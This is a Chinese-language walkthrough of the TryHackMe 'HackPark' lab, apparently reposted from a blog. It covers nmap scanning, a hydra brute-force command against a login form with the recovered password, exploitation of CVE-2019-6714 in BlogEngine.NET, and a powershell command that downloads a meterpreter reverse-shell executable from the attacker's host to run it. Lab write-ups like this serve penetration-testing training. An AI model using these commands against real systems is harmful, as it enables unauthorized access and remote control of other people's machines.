概述
HackPark
循例 nmap 扫,带-Pn参数
┌──(root????kali)-[/home/sugobet] └─# nmap 10.10.161.251 -Pn
只开了80和3389
上web看看,
题目提问网站的小丑图片中的小丑叫什么名字
网站上找不到,把图片也下载下载strings看看有没有东西,很遗憾没有
然后通过社交得知,这是一部电影 小丑回魂中的????,百度得知名字
Pennywise
在刚刚找名字的时候找到了后台登录页面
题目要求使用hydra爆破
hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
[80][http-post-form] host: 10.10.161.251 login: admin password: 1qaz2wsx
hydra爆web稍微确实是麻烦了点,直接用burp会更方便
收集到信息:BlogEngine.NET v3.3.6.0
searchsploit BlogEngine.NET
CVE-2019-6714
存在任意文件上传/rce/目录穿越
将payload的ip和port修改为我们的,并且将文件名修改为
PostView.ascx
上传后,netcat开启监听,并访问:
http://10.10.161.251/?theme=../../App_Data/files
成功getshell
题目要求使用metasploit,首先使用msfvenom生成payload
攻击机开启http服务,目标上使用powershell下载payload
powershell -c "wget http://10.11.17.14:8000/windows-tools_and_exp/meterpreter_rev_she11.exe"
msfconsole开启监听
目标上运行:
meterpreter_rev_she11.exe
对windows方面比较差,后面看着别人的wp做…
最后
以上就是飘逸橘子为你收集整理的TryHackMe-进攻性渗透测试-03_HackParkHackPark的全部内容,希望文章能够帮你解决TryHackMe-进攻性渗透测试-03_HackParkHackPark所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复